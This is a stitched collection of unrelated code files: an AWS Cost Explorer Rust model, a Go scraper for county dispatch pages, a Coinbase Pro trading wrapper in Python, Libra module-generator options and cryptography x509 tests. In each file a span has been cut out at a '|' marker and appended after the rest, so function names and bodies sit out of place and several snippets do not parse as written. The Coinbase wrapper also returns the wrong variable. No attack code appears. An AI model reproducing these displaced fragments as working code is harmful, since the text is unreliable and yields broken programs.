/// <p>The Amazon Web Services Region that's associated with the cost anomaly. </p>
pub region: std::option::Option<std::string::String>,
/// <p>The member account value that's associated with the cost anomaly. </p>
pub linked_account: std::option::Option<std::string::String>,
/// <p>The <code>UsageType</code> value that's associated with the cost anomaly. </p>
pub usage_type: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for RootCause {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("RootCause");
formatter.field("service", &self.service);
formatter.field("region", &self.region);
formatter.field("linked_account", &self.linked_account);
formatter.field("usage_type", &self.usage_type);
formatter.finish()
}
}
/// See [`RootCause`](crate::model::RootCause)
pub mod root_cause {
/// A builder for [`RootCause`](crate::model::RootCause)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) service: std::option::Option<std::string::String>,
pub(crate) region: std::option::Option<std::string::String>,
pub(crate) linked_account: std::option::Option<std::string::String>,
pub(crate) usage_type: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The Amazon Web Services service name that's associated with the cost anomaly. </p>
pub fn service(mut self, input: impl Into<std::string::String>) -> Self {
self.service = Some(input.into());
self
}
pub fn set_service(mut self, input: std::option::Option<std::string::String>) -> Self {
self.service = input;
self
}
/// <p>The Amazon Web Services Region that's associated with the cost anomaly. </p>
pub fn region(mut self, input: impl Into<std::string::String>) -> Self {
self.region = Some(input.into());
self
}
pub fn set_region(mut self, input: std::option::Option<std::string::String>) -> Self {
self.region = input;
self
}
/// <p>The member account value that's associated with the cost anomaly. </p>
pub fn linked_account(mut self, input: impl Into<std::string::String>) -> Self {
self.linked_account = Some(input.into());
self
}
pub fn set_linked_account(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.linked_account = input;
self
}
/// <p>The <code>UsageType</code> value that's associated with the cost anomaly. </p>
pub fn usage_type(mut self, input: impl Into<std::string::String>) -> Self {
self.usage_type = Some(input.into());
self
}
pub fn set_usage_type(mut self, input: std::option::Option<std::string::String>) -> Self {
self.usage_type = input;
self
}
/// Consumes the builder and constructs a [`RootCause`](crate::model::RootCause)
pub fn build(self) -> crate::model::RootCause {
crate::model::RootCause {
service: self.service,
region: self.region,
linked_account: self.linked_account,
usage_type: self.usage_type,
}
}
}
}
impl RootCause {
/// Creates a new builder-style object to manufacture [`RootCause`](crate::model::RootCause)
pub fn builder() -> crate::model::root_cause::Builder {
crate::model::root_cause::Builder::default()
}
}
/// <p>Filters cost anomalies based on the total impact. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct TotalImpactFilter {
/// <p>The comparing value that's used in the filter. </p>
pub numeric_operator: std::option::Option<crate::model::NumericOperator>,
/// <p>The lower bound dollar value that's used in the filter. </p>
pub start_value: f64,
/// <p>The upper bound dollar value that's used in the filter. </p>
pub end_value: f64,
}
impl std::fmt::Debug for TotalImpactFilter {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("TotalImpactFilter");
formatter.field("numeric_operator", &self.numeric_operator);
formatter.field("start_value", &self.start_value);
formatter.field("end_value", &self.end_value);
formatter.finish()
}
}
/// See [`TotalImpactFilter`](crate::model::TotalImpactFilter)
pub mod total_impact_filter {
/// A builder for [`TotalImpactFilter`](crate::model::TotalImpactFilter)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) numeric_operator: std::option::Option<crate::model::NumericOperator>,
pub(crate) start_value: std::option::Option<f64>,
pub(crate) end_value: std::option::Option<f64>,
}
impl Builder {
/// <p>The comparing value that's used in the filter. </p>
pub fn numeric_operator(mut self, input: crate::model::NumericOperator) -> Self {
self.numeric_operator = Some(input);
self
}
pub fn set_numeric_operator(
mut self,
input: std::option::Option<crate::model::NumericOperator>,
) -> Self {
self.numeric_operator = input;
self
}
/// <p>The lower bound dollar value that's used in the filter. </p>
pub fn start_value(mut self, input: f64) -> Self {
self.start_value = Some(input);
self
}
pub fn set_start_value(mut self, input: std::option::Option<f64>) -> Self {
self.start_value = input;
self
}
/// <p>The upper bound dollar value that's used in the filter. </p>
pub fn end_value(mut self, input: f64) -> Self {
self.end_value = Some(input);
self
}
pub fn set_end_value(mut self, input: std::option::Option<f64>) -> Self {
self.end_value = input;
self
}
/// Consumes the builder and constructs a [`TotalImpactFilter`](crate::model::TotalImpactFilter)
pub fn build(self) -> crate::model::TotalImpactFilter {
crate::model::TotalImpactFilter {
numeric_operator: self.numeric_operator,
start_value: self.start_value.unwrap_or_default(),
end_value: self.end_value.unwrap_or_default(),
}
}
}
}
impl TotalImpactFilter {
/// Creates a new builder-style object to manufacture [`TotalImpactFilter`](crate::model::TotalImpactFilter)
pub fn builder() -> crate::model::total_impact_filter::Builder {
crate::model::total_impact_filter::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum NumericOperator {
Between,
Equal,
GreaterThan,
GreaterThanOrEqual,
LessThan,
LessThanOrEqual,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for NumericOperator {
fn from(s: &str) -> Self {
match s {
"BETWEEN" => NumericOperator::Between,
"EQUAL" => NumericOperator::Equal,
"GREATER_THAN" => NumericOperator::GreaterThan,
"GREATER_THAN_OR_EQUAL" => NumericOperator::GreaterThanOrEqual,
"LESS_THAN" => NumericOperator::LessThan,
"LESS_THAN_OR_EQUAL" => NumericOperator::LessThanOrEqual,
other => NumericOperator::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for NumericOperator {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(NumericOperator::from(s))
}
}
impl NumericOperator {
pub fn as_str(&self) -> &str {
match self {
NumericOperator::Between => "BETWEEN",
NumericOperator::Equal => "EQUAL",
NumericOperator::GreaterThan => "GREATER_THAN",
NumericOperator::GreaterThanOrEqual => "GREATER_THAN_OR_EQUAL",
NumericOperator::LessThan => "LESS_THAN",
NumericOperator::LessThanOrEqual => "LESS_THAN_OR_EQUAL",
NumericOperator::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&[
"BETWEEN",
"EQUAL",
"GREATER_THAN",
"GREATER_THAN_OR_EQUAL",
"LESS_THAN",
"LESS_THAN_OR_EQUAL",
]
}
}
impl AsRef<str> for NumericOperator {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>The time period for an anomaly. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct AnomalyDateInterval {
/// <p>The first date an anomaly was observed. </p>
pub start_date: std::option::Option<std::string::String>,
/// <p>The last date an anomaly was observed. </p>
pub end_date: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for AnomalyDateInterval {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("AnomalyDateInterval");
formatter.field("start_date", &self.start_date);
formatter.field("end_date", &self.end_date);
formatter.finish()
}
}
/// See [`AnomalyDateInterval`](crate::model::AnomalyDateInterval)
pub mod anomaly_date_interval {
/// A builder for [`AnomalyDateInterval`](crate::model::AnomalyDateInterval)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) start_date: std::option::Option<std::string::String>,
pub(crate) end_date: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The first date an anomaly was observed. </p>
pub fn start_date(mut self, input: impl Into<std::string::String>) -> Self {
self.start_date = Some(input.into());
self
}
pub fn set_start_date(mut self, input: std::option::Option<std::string::String>) -> Self {
self.start_date = input;
self
}
/// <p>The last date an anomaly was observed. </p>
pub fn end_date(mut self, input: impl Into<std::string::String>) -> Self {
self.end_date = Some(input.into());
self
}
pub fn set_end_date(mut self, input: std::option::Option<std::string::String>) -> Self {
self.end_date = input;
self
}
/// Consumes the builder and constructs a [`AnomalyDateInterval`](crate::model::AnomalyDateInterval)
pub fn build(self) -> crate::model::AnomalyDateInterval {
crate::model::AnomalyDateInterval {
start_date: self.start_date,
end_date: self.end_date,
}
}
}
}
impl AnomalyDateInterval {
/// Creates a new builder-style object to manufacture [`AnomalyDateInterval`](crate::model::AnomalyDateInterval)
pub fn builder() -> crate::model::anomaly_date_interval::Builder {
crate::model::anomaly_date_interval::Builder::default()
}
}
/// <p>The structure of Cost Categories. This includes detailed metadata and the set of rules
/// for the <code>CostCategory</code> object.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CostCategory {
/// <p>The unique identifier for your Cost Category. </p>
pub cost_category_arn: std::option::Option<std::string::String>,
/// <p>The effective state data of your Cost Category.</p>
pub effective_start: std::option::Option<std::string::String>,
/// <p> The effective end data of your Cost Category.</p>
pub effective_end: std::option::Option<std::string::String>,
/// <p>The unique name of the Cost Category.</p>
pub name: std::option::Option<std::string::String>,
/// <p>The rule schema version in this particular Cost Category.</p>
pub rule_version: std::option::Option<crate::model::CostCategoryRuleVersion>,
/// <p>The rules are processed in order. If there are multiple rules that match the line
/// item, then the first rule to match is used to determine that Cost Category value.
/// </p>
pub rules: std::option::Option<std::vec::Vec<crate::model::CostCategoryRule>>,
/// <p> The split charge rules that are used to allocate your charges between your Cost
/// Category values. </p>
pub split_charge_rules:
std::option::Option<std::vec::Vec<crate::model::CostCategorySplitChargeRule>>,
/// <p>The list of processing statuses for Cost Management products for a specific cost
/// category. </p>
pub processing_status:
std::option::Option<std::vec::Vec<crate::model::CostCategoryProcessingStatus>>,
/// <p>The
/// default value for the cost category.</p>
pub default_value: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for CostCategory {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("CostCategory");
formatter.field("cost_category_arn", &self.cost_category_arn);
formatter.field("effective_start", &self.effective_start);
formatter.field("effective_end", &self.effective_end);
formatter.field("name", &self.name);
formatter.field("rule_version", &self.rule_version);
formatter.field("rules", &self.rules);
formatter.field("split_charge_rules", &self.split_charge_rules);
formatter.field("processing_status", &self.processing_status);
formatter.field("default_value", &self.default_value);
formatter.finish()
}
}
/// See [`CostCategory`](crate::model::CostCategory)
pub mod cost_category {
/// A builder for [`CostCategory`](crate::model::CostCategory)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) cost_category_arn: std::option::Option<std::string::String>,
pub(crate) effective_start: std::option::Option<std::string::String>,
pub(crate) effective_end: std::option::Option<std::string::String>,
pub(crate) name: std::option::Option<std::string::String>,
pub(crate) rule_version: std::option::Option<crate::model::CostCategoryRuleVersion>,
pub(crate) rules: std::option::Option<std::vec::Vec<crate::model::CostCategoryRule>>,
pub(crate) split_charge_rules:
std::option::Option<std::vec::Vec<crate::model::CostCategorySplitChargeRule>>,
pub(crate) processing_status:
std::option::Option<std::vec::Vec<crate::model::CostCategoryProcessingStatus>>,
pub(crate) default_value: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The unique identifier for your Cost Category. </p>
pub fn cost_category_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.cost_category_arn = Some(input.into());
self
}
pub fn set_cost_category_arn(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.cost_category_arn = input;
self
}
/// <p>The effective state data of your Cost Category.</p>
pub fn effective_start(mut self, input: impl Into<std::string::String>) -> Self {
self.effective_start = Some(input.into());
self
}
pub fn set_effective_start(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.effective_start = input;
self
}
/// <p> The effective end data of your Cost Category.</p>
pub fn effective_end(mut self, input: impl Into<std::string::String>) -> Self {
self.effective_end = Some(input.into());
self
}
pub fn set_effective_end(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.effective_end = input;
self
}
/// <p>The unique name of the Cost Category.</p>
pub fn name(mut self, input: impl Into<std::string::String>) -> Self {
self.name = Some(input.into());
self
}
pub fn set_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.name = input;
self
}
/// <p>The rule schema version in this particular Cost Category.</p>
pub fn rule_version(mut self, input: crate::model::CostCategoryRuleVersion) -> Self {
self.rule_version = Some(input);
self
}
pub fn set_rule_version(
mut self,
input: std::option::Option<crate::model::CostCategoryRuleVersion>,
) -> Self {
self.rule_version = input;
self
}
pub fn rules(mut self, input: impl Into<crate::model::CostCategoryRule>) -> Self {
let mut v = self.rules.unwrap_or_default();
v.push(input.into());
self.rules = Some(v);
self
}
pub fn set_rules(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::CostCategoryRule>>,
) -> Self {
self.rules = input;
self
}
pub fn split_charge_rules(
mut self,
input: impl Into<crate::model::CostCategorySplitChargeRule>,
) -> Self {
let mut v = self.split_charge_rules.unwrap_or_default();
v.push(input.into());
self.split_charge_rules = Some(v);
self
}
pub fn set_split_charge_rules(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::CostCategorySplitChargeRule>>,
) -> Self {
self.split_charge_rules = input;
self
}
pub fn processing_status(
mut self,
input: impl Into<crate::model::CostCategoryProcessingStatus>,
) -> Self {
let mut v = self.processing_status.unwrap_or_default();
v.push(input.into());
self.processing_status = Some(v);
self
}
pub fn set_processing_status(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::CostCategoryProcessingStatus>>,
) -> Self {
self.processing_status = input;
self
}
/// <p>The
/// default value for the cost category.</p>
pub fn default_value(mut self, input: impl Into<std::string::String>) -> Self {
self.default_value = Some(input.into());
self
}
pub fn set_default_value(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.default_value = input;
self
}
/// Consumes the builder and constructs a [`CostCategory`](crate::model::CostCategory)
pub fn build(self) -> crate::model::CostCategory {
crate::model::CostCategory {
cost_category_arn: self.cost_category_arn,
effective_start: self.effective_start,
effective_end: self.effective_end,
name: self.name,
rule_version: self.rule_version,
rules: self.rules,
split_charge_rules: self.split_charge_rules,
processing_status: self.processing_status,
default_value: self.default_value,
}
}
}
}
impl CostCategory {
/// Creates a new builder-style object to manufacture [`CostCategory`](crate::model::CostCategory)
pub fn builder() -> crate::model::cost_category::Builder {
crate::model::cost_category::Builder::default()
}
}
| _str(s: |
parse.go | package parse
import (
"encoding/json"
"golang.org/x/net/html"
"log"
"strings"
"time"
)
type DB struct {
r map[string]string
v []string
}
func Tag(s string) ([]string, []string, error) {
doc, err := html.Parse(strings.NewReader(s))
r := []string{}
l := []string{}
if err != nil {
return r, l, err
}
var f func(*html.Node)
f = func(n *html.Node) {
if n.Type == html.ElementNode && n.Data == "a" {
for _, a := range n.Attr {
if a.Key == "href" {
if strings.Contains(a.Val, "map.asp?type=") {
// fmt.Println(a.Val)
r = append(r, a.Val)
} else if strings.Contains(a.Val, "livecad") {
l = append(l, a.Val)
}
break
}
}
}
for c := n.FirstChild; c != nil; c = c.NextSibling {
f(c)
}
}
f(doc)
return r, l, err
}
func Strip(s string) map[string]string {
//fmt.Printf("%v\n", s)
m := map[string]string{}
s = CleanUp(s)
for _, v := range strings.Split(s, "&") {
ss := strings.Split(v, "=")
if len(ss) == 2 {
//fmt.Printf("M: %s, %s\n", ss[0], ss[1])
m[ss[0]] = ss[1]
}
}
return m
}
func CleanUp(s string) string {
s = strings.Replace(s, "livecadcomments-fireems.asp?eid", "eid", -1)
s = strings.Replace(s, "map.asp?type", "type", -1)
s = strings.Replace(s, "<br>", " ", -1)
s = strings.Replace(s, " @ ", " ", -1)
return s
}
func GetDetail(purl string) string {
url := "https://webapp02.montcopa.org/eoc/cadinfo/" + purl
return strings.Replace(url, " ", "%20", -1)
}
func GetTable(s string) ([]string, error) {
doc, err := html.Parse(strings.NewReader(s))
r := []string{}
if err != nil {
return r, err
}
var f func(*html.Node)
f = func(n *html.Node) {
if n.Type == html.ElementNode && n.Data == "table" {
}
for c := n.FirstChild; c != nil; c = c.NextSibling {
if c.Data == "td" {
if c.FirstChild.Data == "b" {
//c = c.FirstChild
return
}
if c.FirstChild.Data == "font" {
r = append(r, c.FirstChild.FirstChild.Data)
} else {
r = append(r, c.FirstChild.Data)
}
}
f(c)
}
}
f(doc)
return r, nil
}
func GetTableV2(s string) ([]string, error) {
doc, err := html.Parse(strings.NewReader(s))
r := []string{}
if err != nil {
return r, err
}
var f func(*html.Node)
f = func(n *html.Node) {
if n.Type == html.ElementNode && n.Data == "table" {
}
for c := n.FirstChild; c != nil; c = c.NextSibling {
if c.Data == "td" {
if c.FirstChild.Data == "b" |
if c.FirstChild.Data == "font" {
r = append(r, c.FirstChild.FirstChild.Data)
} else {
r = append(r, c.FirstChild.Data)
}
}
f(c)
}
}
f(doc)
return r, nil
}
func ToJson(call []map[string]string, status [][]string) ([]byte, error) {
type Calls struct {
Call map[string]string
Status []string
}
calls := []*Calls{}
if len(status) < len(call) {
log.Printf("len(status) < len(call)\n")
for i := len(status); i < len(call); i++ {
status = append(status, []string{})
}
}
for i, v := range call {
nt := new(Calls)
nt.Call = v
nt.Status = status[i]
calls = append(calls, nt)
}
type DB struct {
Calls []*Calls
TimeStamp time.Time
}
return json.Marshal(DB{calls, time.Now()})
}
| {
//c = c.FirstChild
return
} |
Coinbase.py | import cbpro
import pandas as pd
from base64 import b64encode
class Coinbase:
def __init__(self, API_KEY, API_SECRET, API_PASS, ENV_URL="https://api-public.sandbox.pro.coinbase.com"):
self.API_KEY = API_KEY
self.API_SECRET = API_SECRET
self.API_PASS = API_PASS
self.ENV_URL = ENV_URL
self.client = cbpro.AuthenticatedClient(self.API_KEY, self.API_SECRET, self.API_PASS, api_url=self.ENV_URL)
def | (self):
print('Authenticating Coinbase')
def place_market(self, action, ticker, amount):
order = self.client.place_market_order(
product_id=ticker,
side=action,
funds=amount
)
return place_market
def place_limit_order(self, action, ticker, entry_price, size):
entry_order = self.client.place_limit_order(product_id=ticker,
side=action,
price=entry_price,
size=size)
print(entry_order)
return entry_order
def get_accounts(self):
return self.client.get_accounts()
def orders(self):
return self.client.get_orders()
def fills(self):
return self.client.get_fills()
def historical_rates(self, ticker: str):
rates = self.client.get_product_historic_rates(ticker, granularity=86400)
df = pd.DataFrame(rates, columns=["time","low","high","open","close","volume"])
return df
| auth |
options.rs | // Copyright (c) The Libra Core Contributors
// SPDX-License-Identifier: Apache-2.0
//! Defines constants and options that are used for module generation
#[derive(Clone, Debug)]
pub struct ModuleGeneratorOptions {
/// The maximum number of locals that can be defined within a generated function definition.
pub max_locals: usize,
/// The maximum number of fields that will be generated for any struct.
pub max_fields: usize,
pub min_fields: usize,
/// The maximum number of structs that can be generated for a module
pub max_structs: usize,
/// The maximum number of functions that can be generated for a module.
pub max_functions: usize,
/// The maximum number of type parameters functions and structs.
pub max_ty_params: usize,
/// The maximum size that generated byte arrays can be.
pub byte_array_max_size: usize,
/// The maximum size that a generated string can be.
pub max_string_size: usize,
/// The maximum number of arguments to generated function definitions.
pub max_function_call_size: usize,
/// The maximum number of return types of generated function definitions.
pub max_ret_types_size: usize,
/// Whether or not generate modules should only contain simple (non-reference, or nested
/// struct) types.
pub simple_types_only: bool,
/// Whether the generated modules should have any resources declared.
pub add_resources: bool,
/// The minimum number of entries in any table
pub min_table_size: usize,
}
impl Default for ModuleGeneratorOptions {
fn default() -> Self |
}
| {
Self {
min_fields: 1,
max_locals: 10,
max_fields: 20,
max_structs: 100,
max_functions: 100,
max_ty_params: 5,
byte_array_max_size: 64,
max_string_size: 32,
max_function_call_size: 23,
max_ret_types_size: 4,
simple_types_only: false,
add_resources: true,
min_table_size: 1,
}
} |
test_x509_ext.py | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
import binascii
import datetime
import ipaddress
import os
import typing
import pretend
import pytest
from cryptography import x509
from cryptography.hazmat.backends.interfaces import (
DSABackend,
EllipticCurveBackend,
RSABackend,
X509Backend,
)
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.x509 import DNSName, NameConstraints, SubjectAlternativeName
from cryptography.x509.extensions import _key_identifier_from_public_key
from cryptography.x509.oid import (
AuthorityInformationAccessOID,
ExtendedKeyUsageOID,
ExtensionOID,
NameOID,
ObjectIdentifier,
SubjectInformationAccessOID,
_OID_NAMES,
)
from .test_x509 import _load_cert
from ..hazmat.primitives.fixtures_rsa import RSA_KEY_2048
from ..hazmat.primitives.test_ec import _skip_curve_unsupported
from ..utils import load_vectors_from_file
def _make_certbuilder(private_key):
name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "example.org")])
return (
x509.CertificateBuilder()
.subject_name(name)
.issuer_name(name)
.public_key(private_key.public_key())
.serial_number(777)
.not_valid_before(datetime.datetime(1999, 1, 1))
.not_valid_after(datetime.datetime(2020, 1, 1))
)
class TestExtension(object):
def test_not_an_oid(self):
bc = x509.BasicConstraints(ca=False, path_length=None)
with pytest.raises(TypeError):
x509.Extension("notanoid", True, bc) # type:ignore[arg-type]
def test_critical_not_a_bool(self):
bc = x509.BasicConstraints(ca=False, path_length=None)
with pytest.raises(TypeError):
x509.Extension(
ExtensionOID.BASIC_CONSTRAINTS,
"notabool", # type:ignore[arg-type]
bc,
)
def test_repr(self):
bc = x509.BasicConstraints(ca=False, path_length=None)
ext = x509.Extension(ExtensionOID.BASIC_CONSTRAINTS, True, bc)
assert repr(ext) == (
"<Extension(oid=<ObjectIdentifier(oid=2.5.29.19, name=basicConst"
"raints)>, critical=True, value=<BasicConstraints(ca=False, path"
"_length=None)>)>"
)
def test_eq(self):
ext1 = x509.Extension(
x509.ObjectIdentifier("1.2.3.4"),
False,
x509.BasicConstraints(ca=False, path_length=None),
)
ext2 = x509.Extension(
x509.ObjectIdentifier("1.2.3.4"),
False,
x509.BasicConstraints(ca=False, path_length=None),
)
assert ext1 == ext2
def test_ne(self):
ext1 = x509.Extension(
x509.ObjectIdentifier("1.2.3.4"),
False,
x509.BasicConstraints(ca=False, path_length=None),
)
ext2 = x509.Extension(
x509.ObjectIdentifier("1.2.3.5"),
False,
x509.BasicConstraints(ca=False, path_length=None),
)
ext3 = x509.Extension(
x509.ObjectIdentifier("1.2.3.4"),
True,
x509.BasicConstraints(ca=False, path_length=None),
)
ext4 = x509.Extension(
x509.ObjectIdentifier("1.2.3.4"),
False,
x509.BasicConstraints(ca=True, path_length=None),
)
assert ext1 != ext2
assert ext1 != ext3
assert ext1 != ext4
assert ext1 != object()
def test_hash(self):
ext1 = x509.Extension(
ExtensionOID.BASIC_CONSTRAINTS,
False,
x509.BasicConstraints(ca=False, path_length=None),
)
ext2 = x509.Extension(
ExtensionOID.BASIC_CONSTRAINTS,
False,
x509.BasicConstraints(ca=False, path_length=None),
)
ext3 = x509.Extension(
ExtensionOID.BASIC_CONSTRAINTS,
False,
x509.BasicConstraints(ca=True, path_length=None),
)
assert hash(ext1) == hash(ext2)
assert hash(ext1) != hash(ext3)
class TestTLSFeature(object):
def test_not_enum_type(self):
with pytest.raises(TypeError):
x509.TLSFeature([3]) # type:ignore[list-item]
def test_empty_list(self):
with pytest.raises(TypeError):
x509.TLSFeature([])
def test_repr(self):
ext1 = x509.TLSFeature([x509.TLSFeatureType.status_request])
assert repr(ext1) == (
"<TLSFeature(features=[<TLSFeatureType.status_request: 5>])>"
)
def test_eq(self):
ext1 = x509.TLSFeature([x509.TLSFeatureType.status_request])
ext2 = x509.TLSFeature([x509.TLSFeatureType.status_request])
assert ext1 == ext2
def test_ne(self):
ext1 = x509.TLSFeature([x509.TLSFeatureType.status_request])
ext2 = x509.TLSFeature([x509.TLSFeatureType.status_request_v2])
ext3 = x509.TLSFeature(
[
x509.TLSFeatureType.status_request,
x509.TLSFeatureType.status_request_v2,
]
)
assert ext1 != ext2
assert ext1 != ext3
assert ext1 != object()
def test_hash(self):
ext1 = x509.TLSFeature([x509.TLSFeatureType.status_request])
ext2 = x509.TLSFeature([x509.TLSFeatureType.status_request])
ext3 = x509.TLSFeature(
[
x509.TLSFeatureType.status_request,
x509.TLSFeatureType.status_request_v2,
]
)
assert hash(ext1) == hash(ext2)
assert hash(ext1) != hash(ext3)
def test_iter(self):
ext1_features = [x509.TLSFeatureType.status_request]
ext1 = x509.TLSFeature(ext1_features)
assert len(ext1) == 1
assert list(ext1) == ext1_features
ext2_features = [
x509.TLSFeatureType.status_request,
x509.TLSFeatureType.status_request_v2,
]
ext2 = x509.TLSFeature(ext2_features)
assert len(ext2) == 2
assert list(ext2) == ext2_features
def test_indexing(self):
ext = x509.TLSFeature(
[
x509.TLSFeatureType.status_request,
x509.TLSFeatureType.status_request_v2,
]
)
assert ext[-1] == ext[1]
assert ext[0] == x509.TLSFeatureType.status_request
class TestUnrecognizedExtension(object):
def test_invalid_oid(self):
with pytest.raises(TypeError):
x509.UnrecognizedExtension(
"notanoid", b"somedata" # type:ignore[arg-type]
)
def test_eq(self):
ext1 = x509.UnrecognizedExtension(
x509.ObjectIdentifier("1.2.3.4"), b"\x03\x02\x01"
)
ext2 = x509.UnrecognizedExtension(
x509.ObjectIdentifier("1.2.3.4"), b"\x03\x02\x01"
)
assert ext1 == ext2
def test_ne(self):
ext1 = x509.UnrecognizedExtension(
x509.ObjectIdentifier("1.2.3.4"), b"\x03\x02\x01"
)
ext2 = x509.UnrecognizedExtension(
x509.ObjectIdentifier("1.2.3.4"), b"\x03\x02\x02"
)
ext3 = x509.UnrecognizedExtension(
x509.ObjectIdentifier("1.2.3.5"), b"\x03\x02\x01"
)
assert ext1 != ext2
assert ext1 != ext3
assert ext1 != object()
def test_repr(self):
ext1 = x509.UnrecognizedExtension(
x509.ObjectIdentifier("1.2.3.4"), b"\x03\x02\x01"
)
assert repr(ext1) == (
"<UnrecognizedExtension(oid=<ObjectIdentifier(oid=1.2.3.4, "
"name=Unknown OID)>, value=b'\\x03\\x02\\x01')>"
)
def test_hash(self):
ext1 = x509.UnrecognizedExtension(
x509.ObjectIdentifier("1.2.3.4"), b"\x03\x02\x01"
)
ext2 = x509.UnrecognizedExtension(
x509.ObjectIdentifier("1.2.3.4"), b"\x03\x02\x01"
)
ext3 = x509.UnrecognizedExtension(
x509.ObjectIdentifier("1.2.3.5"), b"\x03\x02\x01"
)
assert hash(ext1) == hash(ext2)
assert hash(ext1) != hash(ext3)
class TestCertificateIssuer(object):
def test_iter_names(self):
ci = x509.CertificateIssuer(
[x509.DNSName("cryptography.io"), x509.DNSName("crypto.local")]
)
assert len(ci) == 2
assert list(ci) == [
x509.DNSName("cryptography.io"),
x509.DNSName("crypto.local"),
]
def test_indexing(self):
ci = x509.CertificateIssuer(
[
x509.DNSName("cryptography.io"),
x509.DNSName("crypto.local"),
x509.DNSName("another.local"),
x509.RFC822Name("[email protected]"),
x509.UniformResourceIdentifier("http://another.local"),
]
)
assert ci[-1] == ci[4]
assert ci[2:6:2] == [ci[2], ci[4]]
def test_eq(self):
ci1 = x509.CertificateIssuer([x509.DNSName("cryptography.io")])
ci2 = x509.CertificateIssuer([x509.DNSName("cryptography.io")])
assert ci1 == ci2
def test_ne(self):
ci1 = x509.CertificateIssuer([x509.DNSName("cryptography.io")])
ci2 = x509.CertificateIssuer([x509.DNSName("somethingelse.tld")])
assert ci1 != ci2
assert ci1 != object()
def test_repr(self):
ci = x509.CertificateIssuer([x509.DNSName("cryptography.io")])
assert repr(ci) == (
"<CertificateIssuer(<GeneralNames([<DNSName(value="
"'cryptography.io')>])>)>"
)
def test_get_values_for_type(self):
ci = x509.CertificateIssuer([x509.DNSName("cryptography.io")])
names = ci.get_values_for_type(x509.DNSName)
assert names == ["cryptography.io"]
def test_hash(self):
ci1 = x509.CertificateIssuer([x509.DNSName("cryptography.io")])
ci2 = x509.CertificateIssuer([x509.DNSName("cryptography.io")])
ci3 = x509.CertificateIssuer(
[x509.UniformResourceIdentifier("http://something")]
)
assert hash(ci1) == hash(ci2)
assert hash(ci1) != hash(ci3)
class TestCRLReason(object):
def test_invalid_reason_flags(self):
with pytest.raises(TypeError):
x509.CRLReason("notareason") # type:ignore[arg-type]
def test_eq(self):
reason1 = x509.CRLReason(x509.ReasonFlags.unspecified)
reason2 = x509.CRLReason(x509.ReasonFlags.unspecified)
assert reason1 == reason2
def test_ne(self):
reason1 = x509.CRLReason(x509.ReasonFlags.unspecified)
reason2 = x509.CRLReason(x509.ReasonFlags.ca_compromise)
assert reason1 != reason2
assert reason1 != object()
def test_hash(self):
reason1 = x509.CRLReason(x509.ReasonFlags.unspecified)
reason2 = x509.CRLReason(x509.ReasonFlags.unspecified)
reason3 = x509.CRLReason(x509.ReasonFlags.ca_compromise)
assert hash(reason1) == hash(reason2)
assert hash(reason1) != hash(reason3)
def test_repr(self):
reason1 = x509.CRLReason(x509.ReasonFlags.unspecified)
assert repr(reason1) == ("<CRLReason(reason=ReasonFlags.unspecified)>")
class TestDeltaCRLIndicator(object):
def test_not_int(self):
with pytest.raises(TypeError):
x509.DeltaCRLIndicator("notanint") # type:ignore[arg-type]
def test_eq(self):
delta1 = x509.DeltaCRLIndicator(1)
delta2 = x509.DeltaCRLIndicator(1)
assert delta1 == delta2
def test_ne(self):
delta1 = x509.DeltaCRLIndicator(1)
delta2 = x509.DeltaCRLIndicator(2)
assert delta1 != delta2
assert delta1 != object()
def test_repr(self):
delta1 = x509.DeltaCRLIndicator(2)
assert repr(delta1) == ("<DeltaCRLIndicator(crl_number=2)>")
def test_hash(self):
delta1 = x509.DeltaCRLIndicator(1)
